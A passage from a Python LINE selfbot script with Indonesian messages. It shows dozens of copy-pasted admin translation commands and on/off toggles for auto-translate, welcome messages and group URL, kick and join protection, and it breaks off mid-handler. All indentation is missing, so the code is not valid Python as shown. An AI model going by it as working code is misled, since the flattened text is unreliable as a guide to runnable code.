aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-zh-tw "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='zh-tw')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-co "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='co')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hr "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hr')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-cs "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='cs')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-da "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='da')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-nl "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='nl')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-en "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-et "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='et')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fi "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fi')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fr "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fr')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fy "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fy')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-gl "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='gl')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ka "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ka')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-de "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='de')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-el "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='el')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-gu "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='gu')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ht "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ht')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ha "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ha')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-haw "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='haw')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-iw "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='iw')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hi "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hi')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hmn "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hmn')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hu "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hu')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-is "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='is')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ig "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ig')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-id "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ga "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ga')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-it "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='it')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ja "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ja')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-jw "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='jw')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-kn "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='kn')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-kk "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='kk')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-km "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='km')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ko "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ko')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ku "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ku')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ky "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ky')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-lo "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='lo')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-la "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='la')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-lv "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='lv')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-lt "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='lt')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-lb "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='lb')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mk "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mk')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mg "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mg')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ms "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ms')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ml "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ml')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mt "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mt')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mi "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mi')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mr "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mr')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mn "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mn')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-my "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='my')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ne "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ne')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-no "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='no')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ps "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ps')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fa "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fa')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-pl "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='pl')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-pt "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='pt')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-pa "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='pa')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ro "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ro')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ru "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ru')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sm "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sm')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-gd "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='gd')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sr "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sr')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-st "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='st')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sn "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sn')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sd "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sd')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-si "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='si')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sk "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sk')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sl "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sl')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-so "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='so')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-es "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='es')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-su "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='su')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sw "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sw')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sv "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sv')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-tg "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='tg')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ta "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ta')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-te "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='te')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-th "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='th')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-tr "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='tr')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-uk "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='uk')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ur "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ur')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-uz "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='uz')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-vi "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='vi')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-cy "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='cy')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-xh "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='xh')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-yi "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='yi')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-yo "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='yo')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-zu "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='zu')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fil "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fil')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-he "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='he')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
#===========Ayarlar============#
elif 'Simi ' in msg.text:
spl = msg.text.replace('Simi ','')
if spl == 'on':
if msg.to in simisimi:
msgs = "Simi-simi sudah aktif"
else:
simisimi.append(msg.to)
ginfo = ki.getGroup(msg.to)
msgs = "Simi-simi Diaktifkan\nDi Group : " +str(ginfo.name)
ki.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in simisimi:
simisimi.remove(msg.to)
ginfo = ki.getGroup(msg.to)
msgs = "Simi-simi Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Simi-simi Sudah Tidak Aktif"
ki.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Autotrans th-' in msg.text:
spl = msg.text.replace('Autotrans th-','')
if spl == 'on':
if msg.to in translateth:
msgs = "Auto Translate sudah aktif"
else:
translateth.append(msg.to)
ginfo = ki.getGroup(msg.to)
msgs = "Auto Translate Diaktifkan\nDi Group : " +str(ginfo.name)
ki.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in translateth:
translateth.remove(msg.to)
ginfo = ki.getGroup(msg.to)
msgs = "Auto Translate Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Auto Translate Sudah Tidak Aktif"
ki.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Autotrans en-' in msg.text:
spl = msg.text.replace('Autotrans en-','')
if spl == 'on':
if msg.to in translateen:
msgs = "Auto Translate sudah aktif"
else:
translateen.append(msg.to)
ginfo = ki.getGroup(msg.to)
msgs = "Auto Translate Diaktifkan\nDi Group : " +str(ginfo.name)
ki.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in translateen:
translateen.remove(msg.to)
ginfo = ki.getGroup(msg.to)
msgs = "Auto Translate Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Auto Translate Sudah Tidak Aktif"
ki.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Autotrans id-' in msg.text:
spl = msg.text.replace('Autotrans id-','')
if spl == 'on':
if msg.to in translateid:
msgs = "Auto Translate sudah aktif"
else:
translateid.append(msg.to)
ginfo = ki.getGroup(msg.to)
msgs = "Auto Translate Diaktifkan\nDi Group : " +str(ginfo.name)
ki.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in translateid:
translateid.remove(msg.to)
ginfo = ki.getGroup(msg.to)
msgs = "Auto Translate Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Auto Translate Sudah Tidak Aktif"
ki.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Autotrans tw-' in msg.text:
spl = msg.text.replace('Autotrans tw-','')
if spl == 'on':
if msg.to in translatetw:
msgs = "Auto Translate sudah aktif"
else:
translatetw.append(msg.to)
ginfo = ki.getGroup(msg.to)
msgs = "Auto Translate Diaktifkan\nDi Group : " +str(ginfo.name)
ki.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in translatetw:
translatetw.remove(msg.to)
ginfo = ki.getGroup(msg.to)
msgs = "Auto Translate Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Auto Translate Sudah Tidak Aktif"
ki.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Autotrans ar-' in msg.text:
spl = msg.text.replace('Autotrans ar-','')
if spl == 'on':
if msg.to in translatear:
msgs = "Auto Translate sudah aktif"
else:
translatear.append(msg.to)
ginfo = ki.getGroup(msg.to)
msgs = "Auto Translate Diaktifkan\nDi Group : " +str(ginfo.name)
ki.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in translatear:
translatear.remove(msg.to)
ginfo = ki.getGroup(msg.to)
msgs = "Auto Translate Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Auto Translate Sudah Tidak Aktif"
ki.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Welcome ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Welcome ','')
if spl == 'on':
if msg.to in welcome:
msgs = "Welcome Msg sudah aktif"
else:
welcome.append(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Welcome Msg diaktifkan\nDi Group : " +str(ginfo.name)
aditmadzs.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in welcome:
welcome.remove(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Welcome Msg dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Welcome Msg sudah tidak aktif"
aditmadzs.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
#===========Koruma============#
elif 'Protecturl ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protecturl ','')
if spl == 'on':
if msg.to in protectqr:
msgs = "Protect url sudah aktif"
else:
protectqr.append(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect url diaktifkan\nDi Group : " +str(ginfo.name)
aditmadzs.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect url dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect url sudah tidak aktif"
aditmadzs.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectkick ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectkick ','')
if spl == 'on':
if msg.to in protectkick:
msgs = "Protect kick sudah aktif"
else:
protectkick.append(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect kick diaktifkan\nDi Group : " +str(ginfo.name)
aditmadzs.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectkick:
protectkick.remove(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect kick dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect kick sudah tidak aktif"
aditmadzs.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectjoin ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectjoin ','')
